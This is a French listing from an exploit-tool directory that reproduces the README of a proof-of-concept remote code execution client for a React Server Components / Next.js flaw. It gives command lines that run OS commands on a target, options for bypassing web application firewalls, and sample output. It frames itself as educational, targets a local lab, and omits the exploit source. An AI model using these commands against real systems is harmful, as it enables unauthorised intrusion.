Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
react2shell-scanner — Détection basée sur la précision des vulnérabilités d'exécution de code à distance RSC/Next.js (CVE-2025-55182, CVE-2025-66478) | Kitploit
Outils/GitHubGitHub/hidden-investigations/react2shell-scanner
Scanners de VulnérabilitésExploitationExploitation d'Applications WebContournement de WAFTests d'IntrusionApprentissage et Éducation
GitHubhidden-investigations/react2shell-scanner

react2shell-scanner

Détection basée sur la précision des vulnérabilités d'exécution de code à distance RSC/Next.js (CVE-2025-55182, CVE-2025-66478)

Voir le dépôtSite web
53il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Scanner React2Shell – avec PoC

CVE-2025-55182 – PoC d’exécution de code à distance (RCE) sur les composants React côté serveur
Client d’exploitation éducatif pour le laboratoire React2Shell de Hidden Investigations.

Ce dépôt contient un outil d’exploitation (PoC) mono-hôte pour la vulnérabilité React2Shell (CVE-2025-55182) ciblant des applications React Server Components / Next.js mal configurées.

Il est conçu pour être utilisé uniquement contre le laboratoire officiel Hidden Investigations React2Shell lab ou des systèmes que vous possédez ou administrez explicitement.


⚠️ Avertissement légal et éthique

Ce projet est fourni strictement à des fins éducatives et de recherche défensive en sécurité :

  • Utilisez cet outil uniquement sur :
    • Le laboratoire officiel Hidden Investigations React2Shell, ou
    • Des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation écrite explicite.
  • Ne pas pointer cet outil vers des sites web aléatoires, des systèmes de production ou des infrastructures que vous ne contrôlez pas.
  • Les auteurs et Hidden Investigations déclinent toute responsabilité en cas d’utilisation abusive ou de dommages.

En utilisant cet outil, vous acceptez de respecter toutes les lois et réglementations applicables.


Fonctionnalités

  • 🔥 Client d’exploitation React2Shell pour CVE-2025-55182
  • 🎯 Ciblage mono-hôte (pas de scan de masse)
  • 📡 Prise en charge de chemins personnalisés et de listes de chemins
  • 🧪 Mode vérification sécurisé (pas de commandes système, juste une sonde de détection)
  • 🪟 Mode compatible Windows (par défaut whoami)
  • 🛡️ Aides pour contournement WAF :
    • Champ multipart de remplissage (--waf-bypass, --waf-bypass-size)
    • Ajustement de mise en page Vercel (--vercel-waf-bypass)
  • 🔐 Options TLS (--insecure, en-têtes personnalisées)
  • 🧾 Sortie JSON (-o/--output, --all-results)
  • 🧘 Sortie mode silencieux propre (idéal pour le pipe vers d’autres outils)

Prérequis

  • Python : 3.8+ (testé avec Python 3.10+)
  • Dépendances :
    • requests

Installez les dépendances via :

root@kitploit:~
pip install -r requirements.txt

Installation

  1. Clonez le dépôt Hidden Investigations :
root@kitploit:~
git clone https://github.com/hidden-investigations/react2shell-poc.git
cd react2shell-poc
  1. (Optionnel mais recommandé) Créez un environnement virtuel :
root@kitploit:~
python3 -m venv venv
source venv/bin/activate   # Sous Windows : venv\Scripts\activate
  1. Installez les dépendances :
root@kitploit:~
pip install -r requirements.txt
  1. Lancez l’outil :
root@kitploit:~
python3 react2shell-scanner.py -h

Utilisation

Aide de base :

root@kitploit:~
python3 react2shell-scanner.py -h

L’outil nécessite une URL cible :

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000 -c "id"
# ou
python3 react2shell-scanner.py --url http://localhost:3000 -c "id"

Si vous l’exécutez sans -t/--target ou -u/--url, il affiche un message d’aide personnalisé et se termine.


Options de la ligne de commande

Cible et chemins

OptionDescriptionValeur par défaut
-t, --targetURL ou domaine cible (obligatoire si --url non utilisé)Aucun
-u, --urlAlias pour --target (style Assetnote)Aucun
--pathChemin à tester (peut être utilisé plusieurs fois, ex. /, /_next)/
--path-fileFichier contenant des chemins à tester (un par ligne)Aucun

Note : Ce PoC est mono-hôte uniquement. L’option -l/--list est présente mais intentionnellement désactivée.


Comportement de l’exploitation / payload

OptionDescriptionValeur par défaut
-c, --commandCommande à exécuter sur la cible (en cas de succès de l’exploitation)id
--safe-checkUtiliser une charge SAFE_CHECK (pas de commande OS, juste une chaîne de marquage)désactivé
--windowsAdapter les valeurs par défaut pour les cibles Windows (ex. utiliser whoami si commande id)désactivé
--waf-bypassAjouter un grand champ multipart de remplissage au corps de la requête pour contourner le WAFdésactivé
--waf-bypass-size KBTaille du champ de remplissage en Ko lors de l’utilisation de --waf-bypass128
--vercel-waf-bypassUtiliser une disposition multipart alternative pour modifier le comportement WAF de Vercel (PoC simplifié)désactivé

Options HTTP / TLS

OptionDescriptionValeur par défaut
--timeout SECONDSDélai d’expiration de la requête en secondes15 (ou 20 si --waf-bypass et aucun délai défini)
-k, --insecureDésactiver la vérification SSL (comme curl -k)désactivé
-H, --headerEn-tête personnalisé, ex. -H "X-Forwarded-For: 127.0.0.1" (répétable)Aucun

Options de sortie / UX

OptionDescriptionValeur par défaut
-o, --output FILEÉcrire les résultats JSON dans le FILEAucun
--all-resultsLors de l’utilisation de --output, inclure également les résultats non vulnérablesdésactivé
-v, --verboseMode verbeux – afficher le statut HTTP et l’en-tête X-Action-Redirectdésactivé
-q, --quietMode silencieux – n’affiche que la sortie normalisée de la commande en cas de succèsdésactivé
--no-colorDésactiver la sortie colorée du terminaldésactivé

Exemple de mode silencieux (sortie propre et multi-lignes) :

root@kitploit:~
python3 react2shell-scanner.py --url http://localhost:3000 -q -c "ls -la"

Sortie :

root@kitploit:~
total 12
drwxr-xr-x    1 root     root            10 Dec 13 21:13 .
drwxr-xr-x    1 root     root             0 Dec 13 21:13 ..
drwxr-xr-x    1 nextjs   nodejs          12 Dec 13 21:13 .next
drwxr-xr-x    1 nextjs   nodejs         396 Dec 13 21:13 node_modules
-rw-r--r--    1 nextjs   nodejs         733 Dec 13 21:13 package.json
drwxr-xr-x    1 root     root            12 Dec 13 19:13 public
-rw-r--r--    1 nextjs   nodejs        5661 Dec 13 21:13 server.js

Options de scan en masse (intentionnellement désactivées)

Les options suivantes existent pour refléter l’interface en ligne de commande d’Assetnote, mais ne sont pas implémentées dans ce PoC pour éviter une utilisation abusive du scan de masse :

OptionStatut
-l, --listNon implémenté
--threads NNon implémenté

Si vous utilisez -l/--list, l’outil affichera un avertissement et se terminera, suggérant d’utiliser le react2shell-scanner original d’Assetnote pour un scan de masse sécurisé à grande échelle.


Exemples

Exécution contre un laboratoire local :

root@kitploit:~
python3 react2shell-scanner.py --url http://localhost:3000 -c "whoami"

Utilisation du contournement WAF avec un champ de remplissage plus grand :

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --waf-bypass --waf-bypass-size 256   -c "id"

Plusieurs chemins sur le même hôte :

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path /   --path /_next/data   -c "id"

Chemins depuis un fichier :

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path-file paths.txt   -c "id"

Mode vérification sécurisé (aucune commande OS exécutée) :

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000 --safe-check

Sortie JSON des résultats dans un fichier :

root@kitploit:~
python3 react2shell-scanner.py -t http://localhost:3000   --path / --path /_next   -c "id"   -o results.json --all-results

Format de sortie JSON

Lorsque -o/--output est utilisé, l’outil écrit un tableau d’objets comme :

root@kitploit:~
[
  {
    "url": "http://localhost:3000/",
    "path": "/",
    "success": true,
    "status": "success",
    "output": "uid=1000(nextjs) gid=1000(nodejs) groups=1000(nodejs)",
    "http": {
      "status_code": 302,
      "headers": {
        "X-Action-Redirect": "NEXT_REDIRECT;push;/login?a=uid%3D1000%28nextjs%29;307;",
        "...": "..."
      }
    }
  }
]

Crédits et remerciements

  • Hidden Investigations – pour la publication du laboratoire éducatif React2Shell et du client PoC.
  • @sakibulalikhan – auteur de l’outil.
  • Assetnote – inspiration pour les idées de contournement WAF via leur react2shell-scanner.

Licence

Ce projet est sous licence MIT. Voir le fichier LICENSE pour plus de détails.

📬 Contactez-nous : [email protected]

Télécharger l’outil